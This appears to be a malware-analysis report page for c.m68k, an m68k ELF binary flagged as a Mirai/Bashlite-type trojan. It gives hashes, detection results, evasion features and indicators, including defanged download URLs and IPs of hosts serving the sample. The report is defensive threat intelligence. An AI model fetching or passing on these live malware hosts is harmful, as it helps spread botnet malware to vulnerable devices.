c.m68k

First submission 2024-09-05 01:06:02 Last submission 2024-09-05 01:13:02

File details

File type: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
Mime type: application/x-executable
File size: 135.08 KB (138320 bytes)
MD5: ddc1b960e6e8514934f4e1fc488d64d9
SHA1: 2b0c80c57b04956c0d3916cc8cc5e1a010f9cc81
SHA256: 65b126e31c5d791273b6f2f9dc78fdb0fbb93793d64ca4ab5ffafd5c14c61d49

File features detected

Is DLL
Packers
Anti Debug
Anti VM
Signed
XOR

OSINT Enrichments

Virus Total: 38/79 VT report date: 2024-09-05 00:48:15
Malware Type 1 trojan
Threat Type 3 mirai bashlite expl

URLs, FQDN and IP indicators 2

URL | Host (FQDN/IP) | Date Added
hXXp://ydl-v2.mhdy.site/c.m68k | ydl-v2.mhdy.site | 2024-09-05 01:13:05
hXXp://5.59.248.92/c.m68k | 5.59.248.92 | 2024-09-05 01:06:02

Strings analysis - Possible IPs found 3

5.59.248.92
127.0.0.1
192.168.0.100

Strings analysis - Possible URLs found 13
